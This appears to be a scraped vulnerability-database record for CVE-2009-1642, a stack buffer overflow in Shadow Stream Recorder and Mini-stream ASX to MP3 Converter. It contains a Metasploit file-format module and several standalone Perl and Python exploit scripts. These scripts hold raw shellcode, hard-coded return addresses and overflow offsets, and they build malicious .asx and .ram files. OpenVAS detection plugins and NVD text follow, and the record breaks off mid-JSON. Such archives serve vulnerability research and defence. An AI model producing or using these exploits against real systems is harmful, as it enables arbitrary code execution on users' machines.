ID EDB-ID:18781 Type exploitdb Reporter metasploit Modified 2012-04-25T00:00:00
Description
Shadow Stream Recorder 3.0.1.7 Buffer Overflow. CVE-2009-1642. Local exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.
Using the application to open a specially crafted asx file, a buffer
overflow may occur to allow arbitrary code execution under the context
of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AlpHaNiX <alpha[at]hacker.bz>', # Original .m3u exploit
'b0telh0 <me[at]gotgeek.com.br>' # MSF Module and .asx exploit
],
'References' =>
[
[ 'BID', '34864' ],
[ 'EDB', '11957' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x09\x0a",
'StackAdjustment' => -3500
},
'Targets' =>
[
[ 'Windows Universal',
{
# push esp - ret ssrfilter03.dll
'Ret' => 0x10035706,
'Offset' => 26117
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.asx'])
], self.class)
end
def exploit
buffer = "http://"
buffer << rand_text_alpha_upper(target['Offset'])
buffer << [target.ret].pack('V')
buffer << make_nops(40)
buffer << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
end
{"id": "EDB-ID:18781", "hash": "adc6dbcbc8d3a8d37b75f504a28dc3aa", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Shadow Stream Recorder 3.0.1.7 - Buffer Overflow", "description": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow. CVE-2009-1642. Local exploit for windows platform", "published": "2012-04-25T00:00:00", "modified": "2012-04-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18781/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-02T10:26:30", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1642"]}, {"type": "exploitdb", "idList": ["EDB-ID:8629", "EDB-ID:11958", "EDB-ID:11957", "EDB-ID:11930", "EDB-ID:8630"]}, {"type": "openvas", "idList": ["OPENVAS:900646", "OPENVAS:1361412562310900646"]}], "modified": "2016-02-02T10:26:30"}, "vulnersScore": 9.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18781/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\r\n\t\t\t\tUsing the application to open a specially crafted asx file, a buffer\r\n\t\t\t\toverflow may occur to allow arbitrary code execution under the context\r\n\t\t\t\tof the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'AlpHaNiX <alpha[at]hacker.bz>', # Original .m3u exploit\r\n\t\t\t\t\t'b0telh0 <me[at]gotgeek.com.br>' # MSF Module and .asx exploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'BID', '34864' ],\r\n\t\t\t\t\t[ 'EDB', '11957' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# push esp - ret ssrfilter03.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x10035706,\r\n\t\t\t\t\t\t\t'Offset' => 26117\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Mar 29 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [true, 'The file name.', 'msf.asx'])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = \"http://\"\r\n\t\tbuffer << rand_text_alpha_upper(target['Offset'])\r\n\t\tbuffer << [target.ret].pack('V')\r\n\t\tbuffer << make_nops(40)\r\n\t\tbuffer << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(buffer)\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["81487"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-12T18:08:01", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote attackers to execute arbitrary code via (1) a long rtsp URL in a .ram file and (2) a long string in the HREF attribute of a REF element in a .asx file. NOTE: the latter was also subsequently reported in \"prior to 3.1.3.7.\"", "modified": "2017-10-11T21:29:00", "published": "2009-05-15T11:30:00", "id": "CVE-2009-1642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1642", "title": "CVE-2009-1642", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:47:59", "bulletinFamily": "exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit. CVE-2009-1642. Local exploit for windows platform", "modified": "2009-05-07T00:00:00", "published": "2009-05-07T00:00:00", "id": "EDB-ID:8629", "href": "https://www.exploit-db.com/exploits/8629/", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .RAM Buffer Overflow Exploit", "sourceData": "#!/usr/bin/perl\n=gnk\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n==============================================================================\n ____ _ _ _ _ ___ _ __\n / ___| | || | | \\ | | / _ \\ | |/ /\n | | _ | || |_ | \\| | | | | | | ' / \n | |_| | |__ _| | |\\ | | |_| | | . \\ \n \\____| |_| |_| \\_| \\___/ |_|\\_\\...From Iran\n\n==============================================================================\n\tMini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit\n==============================================================================\n\t[\u00c2\u00bb] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....\n\t[\u00c2\u00bb] Website:............[ http://mini-stream.net/ ].....................\n\t[\u00c2\u00bb] Today:..............[ 07052009 ]....................................\n\t[\u00c2\u00bb] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........\n==============================================================================\n\n\t[x] tested on \"Windows XP SP2\"... [:-)\n\t\n=cut\n\nmy $MSD = \"rtsp://\".\"G\" x 26117;\nmy $SMN = \"\\x90\" x 16;\nmy $RA = \"\\x5D\\x38\\x82\\x7C\"; # Kernel32.dll\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nmy $Shcode = \"\\x31\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x08\".\n \"\\x99\\x23\\x82\\x83\\xeb\\xfc\\xe2\\xf4\\xf4\\x71\\x67\\x82\\x08\\x99\\xa8\\xc7\".\n \"\\x34\\x12\\x5f\\x87\\x70\\x98\\xcc\\x09\\x47\\x81\\xa8\\xdd\\x28\\x98\\xc8\\xcb\".\n \"\\x83\\xad\\xa8\\x83\\xe6\\xa8\\xe3\\x1b\\xa4\\x1d\\xe3\\xf6\\x0f\\x58\\xe9\\x8f\".\n \"\\x09\\x5b\\xc8\\x76\\x33\\xcd\\x07\\x86\\x7d\\x7c\\xa8\\xdd\\x2c\\x98\\xc8\\xe4\".\n \"\\x83\\x95\\x68\\x09\\x57\\x85\\x22\\x69\\x83\\x85\\xa8\\x83\\xe3\\x10\\x7f\\xa6\".\n \"\\x0c\\x5a\\x12\\x42\\x6c\\x12\\x63\\xb2\\x8d\\x59\\x5b\\x8e\\x83\\xd9\\x2f\\x09\".\n \"\\x78\\x85\\x8e\\x09\\x60\\x91\\xc8\\x8b\\x83\\x19\\x93\\x82\\x08\\x99\\xa8\\xea\".\n \"\\x34\\xc6\\x12\\x74\\x68\\xcf\\xaa\\x7a\\x8b\\x59\\x58\\xd2\\x60\\x69\\xa9\\x86\".\n \"\\x57\\xf1\\xbb\\x7c\\x82\\x97\\x74\\x7d\\xef\\xfa\\x42\\xee\\x6b\\x99\\x23\\x82\";\n\n open(RAM,'>>gnk.ram');\n print RAM $MSD.$RA.$SMN.$Shcode;\n close(RAM);\n\n# milw0rm.com [2009-05-07]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8629/"}, {"lastseen": "2016-02-01T15:24:38", "bulletinFamily": "exploit", "description": "ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit. CVE-2009-1642. Local exploit for windows platform", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "EDB-ID:11958", "href": "https://www.exploit-db.com/exploits/11958/", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n\r\nimport time\r\n# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit\r\n# Author: Hazem Mofeed\r\n# PoC: http://www.exploit-db.com/exploits/11930\r\n# Tested On: Windows Xp Home Edition SP3\r\n# Home: http://hakxer.wordpress.com\r\n\r\nprint ' Exploited by Hazem Mofeed \\n'\r\nprint ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit \\n'\r\n\r\nprint ' building exploit ..........'\r\n\r\ntime.sleep(3)\r\n\r\nshellcode = (\"\\xeb\\x16\\x5b\\x31\\xc0\\x50\\x53\\xbb\\x0d\\x25\\x86\\x7c\\xff\\xd3\\x31\\xc0\"\r\n\"\\x50\\xbb\\x12\\xcb\\x81\\x7c\\xff\\xd3\\xe8\\xe5\\xff\\xff\\xff\\x63\\x61\\x6c\"\r\n\"\\x63\\x2e\\x65\\x78\\x65\")\r\n\r\nret = \"\\x08\\x6A\\x83\\x7C\"\r\nnull = \"\\x90\" * 10\r\nexploit = (\"http://\" + \"\\x41\" * 26117 + ret + null + shellcode )\r\ntry:\r\nfile = open(\"exploit.asx\",\"w\")\r\nfile.write(exploit)\r\nfile.close()\r\nexcept:\r\nprint ' failed '", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11958/"}, {"lastseen": "2016-02-01T15:24:28", "bulletinFamily": "exploit", "description": "Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow. CVE-2009-1642. Local exploit for windows platform", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "EDB-ID:11957", "href": "https://www.exploit-db.com/exploits/11957/", "type": "exploitdb", "title": "Shadow Stream Recorder 3.0.1.7 - .asx Local Buffer Overflow", "sourceData": "#!/usr/bin/python\r\n#\r\n# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow\r\n# Date: 03-29-2010\r\n# Author: b0telh0\r\n# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe\r\n# Tested on: Windows XP SP3\r\n\r\n\r\n#\r\n# windows/exec - 228 bytes\r\n# EXITFUNC=seh, CMD=calc.exe\r\n#\r\n\r\nshellcode = (\"\\xda\\xd6\\xbe\\xc4\\x14\\x6b\\x17\\x31\\xc9\\xd9\\x74\\x24\\xf4\\x58\\xb1\"\r\n\t\"\\x33\\x83\\xe8\\xfc\\x31\\x70\\x14\\x03\\x70\\xd0\\xf6\\x9e\\xeb\\x30\\x7f\"\r\n\t\"\\x60\\x14\\xc0\\xe0\\xe8\\xf1\\xf1\\x32\\x8e\\x72\\xa3\\x82\\xc4\\xd7\\x4f\"\r\n\t\"\\x68\\x88\\xc3\\xc4\\x1c\\x05\\xe3\\x6d\\xaa\\x73\\xca\\x6e\\x1a\\xbc\\x80\"\r\n\t\"\\xac\\x3c\\x40\\xdb\\xe0\\x9e\\x79\\x14\\xf5\\xdf\\xbe\\x49\\xf5\\xb2\\x17\"\r\n\t\"\\x05\\xa7\\x22\\x13\\x5b\\x7b\\x42\\xf3\\xd7\\xc3\\x3c\\x76\\x27\\xb7\\xf6\"\r\n\t\"\\x79\\x78\\x67\\x8c\\x32\\x60\\x0c\\xca\\xe2\\x91\\xc1\\x08\\xde\\xd8\\x6e\"\r\n\t\"\\xfa\\x94\\xda\\xa6\\x32\\x54\\xed\\x86\\x99\\x6b\\xc1\\x0b\\xe3\\xac\\xe6\"\r\n\t\"\\xf3\\x96\\xc6\\x14\\x8e\\xa0\\x1c\\x66\\x54\\x24\\x81\\xc0\\x1f\\x9e\\x61\"\r\n\t\"\\xf0\\xcc\\x79\\xe1\\xfe\\xb9\\x0e\\xad\\xe2\\x3c\\xc2\\xc5\\x1f\\xb5\\xe5\"\r\n\t\"\\x09\\x96\\x8d\\xc1\\x8d\\xf2\\x56\\x6b\\x97\\x5e\\x39\\x94\\xc7\\x07\\xe6\"\r\n\t\"\\x30\\x83\\xaa\\xf3\\x43\\xce\\xa0\\x02\\xc1\\x74\\x8d\\x04\\xd9\\x76\\xbe\"\r\n\t\"\\x6c\\xe8\\xfd\\x51\\xeb\\xf5\\xd7\\x15\\x0d\\x07\\xea\\x83\\x99\\xbe\\x9f\"\r\n\t\"\\xe9\\xc4\\x40\\x4a\\x2d\\xf0\\xc2\\x7f\\xce\\x07\\xda\\xf5\\xcb\\x4c\\x5c\"\r\n\t\"\\xe5\\xa1\\xdd\\x09\\x09\\x15\\xde\\x1b\\x6a\\xf8\\x4c\\xc7\\x43\\x9f\\xf4\"\r\n\t\"\\x62\\x9c\\x55\");\r\n\r\njunk = \"\\x41\" * 26112\r\neip = \"\\x53\\x93\\x37\\x7E\" # 7E379353 USER32.dll (JMP ESP)\r\nnops = \"\\x90\" * 20\r\njunk2 = \"\\x41\" * 3636\r\n\r\ntry:\r\n file = open('b0t.asx','w');\r\n file.write(junk+eip+nops+shellcode+junk2);\r\n file.close();\r\n print \"\\n[+] b0t.asx created.\"\r\n print \"[+] Open ssrecorder.exe...\"\r\n print \"[+] and drag and drop b0t.asx.\\n\"\r\nexcept:\r\n print \"\\n[-] Error.. Can't write file to system.\\n\"\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11957/"}, {"lastseen": "2016-02-01T15:21:28", "bulletinFamily": "exploit", "description": "ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC. CVE-2009-1642. Dos exploit for windows platform", "modified": "2010-03-29T00:00:00", "published": "2010-03-29T00:00:00", "id": "EDB-ID:11930", "href": "https://www.exploit-db.com/exploits/11930/", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC", "sourceData": "#!/usr/bin/perl\r\n# ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC\r\n# Exploited By mat\r\n#\r\n#EAX 00000001\r\n#ECX 41414141\r\n#EDX 00D30000\r\n#EBX 00333ED8\r\n#ESP 000F6C90\r\n#EBP 000FBFB4\r\n#ESI 77C2FCE0 msvcrt.77C2FCE0\r\n#EDI 00006619\r\n#EIP 41414141\r\n###################################################################\r\n\r\nmy $ex=\"http://\".\"\\x41\" x 26121;\r\n###################################################################\r\nopen(MYFILE,'>>mat.asx'); # (.smi) (.smil) (.wpl) (.wax)\r\nprint MYFILE $ex;\r\nclose(MYFILE);\r\n###################################################################", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11930/"}, {"lastseen": "2016-02-01T07:48:07", "bulletinFamily": "exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit. CVE-2009-1642. Local exploit for windows platform", "modified": "2009-05-07T00:00:00", "published": "2009-05-07T00:00:00", "id": "EDB-ID:8630", "href": "https://www.exploit-db.com/exploits/8630/", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .ASX HREF Local BoF Exploit", "sourceData": "#!/usr/bin/perl\n=gnk\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n==============================================================================\n ____ _ _ _ _ ___ _ __\n / ___| | || | | \\ | | / _ \\ | |/ /\n | | _ | || |_ | \\| | | | | | | ' / \n | |_| | |__ _| | |\\ | | |_| | | . \\ \n \\____| |_| |_| \\_| \\___/ |_|\\_\\...From Iran\n\n==============================================================================\n\tMini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit\n==============================================================================\n\t[\u00c2\u00bb] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....\n\t[\u00c2\u00bb] Website:............[ http://mini-stream.net/ ].....................\n\t[\u00c2\u00bb] Today:..............[ 07052009 ]....................................\n\t[\u00c2\u00bb] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........\n==============================================================================\n\n\t[x] tested on Windows XP SP2...\n\t[x] if you are not able to make this shit work, just put it in the Base/Root\n\t of a Drive/Partition, like \"C:\\gnk.asx\"...\n\n=cut\n\nmy $MSD = \"G\" x 26110;\nmy $SMN = \"\\x90\" x 16;\nmy $RA = \"\\x5D\\x38\\x82\\x7C\"; # Kernel32.dll\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nmy $Shcode = \"\\x31\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x08\".\n \"\\x99\\x23\\x82\\x83\\xeb\\xfc\\xe2\\xf4\\xf4\\x71\\x67\\x82\\x08\\x99\\xa8\\xc7\".\n \"\\x34\\x12\\x5f\\x87\\x70\\x98\\xcc\\x09\\x47\\x81\\xa8\\xdd\\x28\\x98\\xc8\\xcb\".\n \"\\x83\\xad\\xa8\\x83\\xe6\\xa8\\xe3\\x1b\\xa4\\x1d\\xe3\\xf6\\x0f\\x58\\xe9\\x8f\".\n \"\\x09\\x5b\\xc8\\x76\\x33\\xcd\\x07\\x86\\x7d\\x7c\\xa8\\xdd\\x2c\\x98\\xc8\\xe4\".\n \"\\x83\\x95\\x68\\x09\\x57\\x85\\x22\\x69\\x83\\x85\\xa8\\x83\\xe3\\x10\\x7f\\xa6\".\n \"\\x0c\\x5a\\x12\\x42\\x6c\\x12\\x63\\xb2\\x8d\\x59\\x5b\\x8e\\x83\\xd9\\x2f\\x09\".\n \"\\x78\\x85\\x8e\\x09\\x60\\x91\\xc8\\x8b\\x83\\x19\\x93\\x82\\x08\\x99\\xa8\\xea\".\n \"\\x34\\xc6\\x12\\x74\\x68\\xcf\\xaa\\x7a\\x8b\\x59\\x58\\xd2\\x60\\x69\\xa9\\x86\".\n \"\\x57\\xf1\\xbb\\x7c\\x82\\x97\\x74\\x7d\\xef\\xfa\\x42\\xee\\x6b\\x99\\x23\\x82\";\n\nmy $ASX = \n\"<asx version=\\\"3.0\\\">\n <title>Title is not important.</title>\n <entry>\n <title>Example...</title>\n <ref href=\\\"\".$MSD.$RA.$SMN.$Shcode.\"\\\" />\n <author>G4N0K</author>\n <copyright>\u00c2\u00a92009 G4N0K</copyright>\n </entry>\n</asx>\";\n\n open(ASX,'>>gnk.asx');\n print ASX $ASX;\n close(ASX);\n\n# milw0rm.com [2009-05-07]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8630/"}], "openvas": [{"lastseen": "2017-07-19T10:55:47", "bulletinFamily": "scanner", "description": "This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-05-26T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900646", "id": "OPENVAS:900646", "title": "Mini-Stream Multiple Products Stack Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_mini_stream_mult_prdts_bof_may09.nasl 6517 2017-07-04 13:34:20Z cfischer $\n#\n# Mini-Stream Multiple Products Stack Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker craft malicious\n'asx' or 'ram' files and execute arbitrary codes to cause stack overflow in\nthe context of the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"Ripper version 3.0.1.1 (3.0.1.5) and prior\nRM-MP3 Converter version 3.0.0.7 and prior\nASXtoMP3 Converter version 3.0.0.7 and prior\";\n\ntag_insight = \"Inadequate boundary checks error of user supplied input to\nMini-stream products which causes stack overflow while processing .ram and\n.asx files with overly long URIs.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900646);\n script_version(\"$Revision: 6517 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:34:20 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-26 15:05:11 +0200 (Tue, 26 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1642\", \"CVE-2009-1641\", \"CVE-2009-1645\");\n script_bugtraq_id(34864);\n script_name(\"Mini-Stream Multiple Products Stack Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8629\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8630\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8633\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8632\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8631\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50374\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50375\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50376\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_mini_stream_prdts_detect.nasl\");\n script_mandatory_keys(\"MiniStream/Products/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nrmMp3 = get_kb_item(\"MiniStream/RmToMp3/Conv/Ver\");\nif(rmMp3)\n{\n if(version_is_less_equal(version:rmMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nasxMp3 = get_kb_item(\"MiniStream/AsxToMp3/Conv/Ver\");\nif(asxMp3)\n{\n if(version_is_less_equal(version:asxMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nripper = get_kb_item(\"MiniStream/Ripper/Ver\");\nif(ripper)\n{\n #Ministream ripper 3.0.1.1 points to the version 3.0.1.5\n if(version_is_less_equal(version:ripper,test_version:\"3.0.1.5\"))\n {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:56", "bulletinFamily": "scanner", "description": "This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.", "modified": "2018-04-06T00:00:00", "published": "2009-05-26T00:00:00", "id": "OPENVAS:1361412562310900646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900646", "title": "Mini-Stream Multiple Products Stack Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_mini_stream_mult_prdts_bof_may09.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# Mini-Stream Multiple Products Stack Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker craft malicious\n'asx' or 'ram' files and execute arbitrary codes to cause stack overflow in\nthe context of the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"Ripper version 3.0.1.1 (3.0.1.5) and prior\nRM-MP3 Converter version 3.0.0.7 and prior\nASXtoMP3 Converter version 3.0.0.7 and prior\";\n\ntag_insight = \"Inadequate boundary checks error of user supplied input to\nMini-stream products which causes stack overflow while processing .ram and\n.asx files with overly long URIs.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900646\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-26 15:05:11 +0200 (Tue, 26 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 